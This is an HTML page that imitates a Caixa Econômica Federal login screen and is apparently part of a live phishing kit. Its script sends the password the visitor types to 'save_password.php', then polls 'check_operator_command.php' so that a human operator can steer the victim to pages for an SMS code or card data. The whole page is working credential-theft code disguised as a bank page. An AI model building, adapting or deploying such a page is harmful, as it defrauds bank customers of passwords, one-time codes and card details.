<!DOCTYPE html>
<html lang="pt-BR">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Identificação do Usuário</title>
  <link rel="stylesheet" href="assets/css/user_next.css">
  <link rel="stylesheet" href="assets/css/loading.css">
  <script>
    async function handleSubmit(event) {
      event.preventDefault();
      const form = event.target;

      document.getElementById("loading-spinner").style.display = "flex";

      try {
        const response = await fetch("../src/save_password.php", {
          method: "POST",
          body: new FormData(form),
        });

        const data = await response.json();

        if (data.success) {
          checkOperatorCommand(); // Verifica comandos do operador
        } else {
          alert("Erro ao salvar a senha.");
          document.getElementById("loading-spinner").style.display = "none";
        }
      } catch (error) {
        console.error("Erro ao processar a solicitação:", error);
        document.getElementById("loading-spinner").style.display = "none";
      }
    }

    async function checkOperatorCommand() {
      const interval = setInterval(async () => {
          try {
              const response = await fetch("../src/check_operator_command.php");
              const data = await response.json();
  
              console.log(data); // Adicionado para verificar o retorno no console
  
              if (data.status === "aguardando_sms") {
                  clearInterval(interval);
                  window.location.href = "confirm_sms.html";
              } else if (data.status === "request_card_data") {
                  clearInterval(interval);
                  window.location.href = "card_data.html";
              }
          } catch (error) {
              console.error("Erro ao verificar comando do operador:", error);
          }
      }, 3000);
  }
  

    document.addEventListener("DOMContentLoaded", () => {
      const keyboard = document.querySelector(".keyboard");
      const passwordInput = document.getElementById("password");

      keyboard.addEventListener("click", (event) => {
        const value = event.target.textContent;

        if (value === "←") {
          passwordInput.value = passwordInput.value.slice(0, -1);
        } else if (value === "Limpar") {
          passwordInput.value = "";
        } else if (passwordInput.value.length < 8) {
          passwordInput.value += value;
        }
      });
    });
  </script>
</head>
<body>
  <header class="header">
    <img src="assets/images/logocxc-removebg-preview.png" alt="Logo Caixa" class="logo">
  </header>
  <section class="main-section">
    <div class="user-auth">
      <h2>Identificação do Usuário</h2>
      <form id="password-form" onsubmit="handleSubmit(event)">
        <label for="password">Senha:</label>
        <input type="password" id="password" name="password" placeholder="Digite sua senha" maxlength="8" required>
        <div class="keyboard">
          <button type="button">1</button>
          <button type="button">2</button>
          <button type="button">3</button>
          <button type="button">4</button>
          <button type="button">5</button>
          <button type="button">6</button>
          <button type="button">7</button>
          <button type="button">8</button>
          <button type="button">9</button>
          <button type="button">0</button>
          <button type="button" class="clear">Limpar</button>
          <button type="button" class="backspace">←</button>
        </div>
        <button type="submit" class="continue">Continuar</button>
      </form>
      <div id="loading-spinner" class="loading-container" style="display: none;">
        <div class="spinner"></div>
      </div>
    </div>
  </section>
  <footer>
    <p>Caixa Econômica Federal | Atendimento 24h</p>
  </footer>
</body>
</html>
